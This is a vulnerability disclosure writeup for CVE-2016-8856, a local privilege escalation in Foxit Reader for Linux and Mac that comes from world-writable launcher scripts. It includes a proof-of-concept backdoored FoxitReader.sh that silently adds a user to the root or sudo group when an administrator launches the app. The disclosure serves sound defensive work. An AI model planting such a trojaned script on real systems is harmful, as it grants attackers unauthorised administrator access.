(CVE-2016-8856) Foxit Reader for Linux and Mac: Local Privilege Escalation Writeup

tl;dr: I found a local privilege escalation bug in Foxit Reader for Mac and Linux. Random find, had to run ls -la to find this. The issue has been assigned CVE-2016-8856.

Introduction

Recently, I stumbled on a very simple bug in Foxit Reader for Mac and Linux (From here on, just Foxit Reader). The vulnerability was caused by improper file permissions granted on core Foxit Reader's files on Linux and Mac systems. An attacker with a low privilege access could've exploited this vulnerability to elevate their privileges, execute commands as a higher privileged user, or both.

The version affected were:

  • Foxit Reader for Mac 2.1.0.0804 and earlier
  • Foxit Reader for Linux 2.1.0.0805 and earlier

Fixed version has been released and security bulletin is published here - https://www.foxitsoftware.com/support/security-bulletins.php.

About the bug:

The issue is caused by the way Foxit Reader installs itself on the Linux/Mac machine. At the time of installation, user is given a choice of where they want to install Foxit. The default locations for installation are:

  • On Linux
    • sudo or root user - /opt/
    • normal user - ~/opt/
  • On Mac
    • /Applications/Foxit Reader.app/

The issue exists in file permissions assigned to the installed files. The installer assigns "rwxrwxrwx" or 0777 permission to most of the files in the installation folder. In these files, the more important ones are:

  • FoxitReader.sh and updater.sh on Linux (tested on Debian 8 Jessie)
  • FoxitReader and updater.app/Contents/MacOS/updater on OS X (tested on Yosemite)

These files are used to launch Foxit Reader and update it, respectively. Since, these files are world-writable, any logged in user with limited privileges can write to these files. After that, whenever a privileged user will open the Foxit Reader application, attacker's custom code would run.

Reproduction/ Exploit Example

The steps described below show how the vulnerability could be exploited on a Linux-based OS. We have tested this on Debian 8.

  1. Search for Foxit reader installation in the system. If not found on above mentioned default locations, you can use following command to search it in system:
find / -iname foxit\* 2> /dev/null  


2. Go to installation folder, generally foxitsoftware/foxitreader/.
3. Open FoxitReader.sh and replace the content with this:

#!/bin/bash
 appname="FoxitReader"
 selfpath="/opt/foxitsoftware/foxitreader"
 LD_LIBRARY_PATH=$selfpath/lib:$selfpath/platforms:$selfpath/printsupport:$selfpath/rmssdk:$selfpath/sensors:$selfpath/imageformats:$selfpath/platforminputcontexts:$LD_LIBRARY_PATH
 export LD_LIBRARY_PATH

# Backdoor starts from here
 if [ "$(id | grep root | wc -l)" == 1 ]
then  
    adduser temp root
elif [ "$(groups | grep sudo | wc -l)" == 1 ]  
then  
    gksudo -- bash -c 'foxit_command_which_does_not_exist_but_hides_our_original_command 2> /dev/null; sudo adduser temp sudo;'
fi  
# Backdoor ends
 exec "$selfpath/$appname" "[email protected]"


4. Wait for root/sudo user to open Foxit Reader.
5. ???
6. Profit.

CVSS

CVSS v3 Base Score: 7.8 High
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

18-09-2016 Vendor notified about the bug.
19-09-2016 Vendor replies they are looking into the issue.
28-09-2016 Vendor confirms and fixes the bug.
18-10-2016 New version with fix released. Applied for CVE.
19-10-2016 CVE-2016-8856 assigned to the vulnerability.

Takeaway

Always make sure that files on your system only have the required permissions. Don't be that guy who chmod's 777 on every file. Another issue is files with SUID/SGID bit on them, but that is a topic for another day/blog post.

Also, to search for world writeable files on your system, run the following command:

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print  

Source <- Excellent source for Linux privilege escalation basic.

Kudos to Foxit's Security Team for prompt acknowledgement and fix.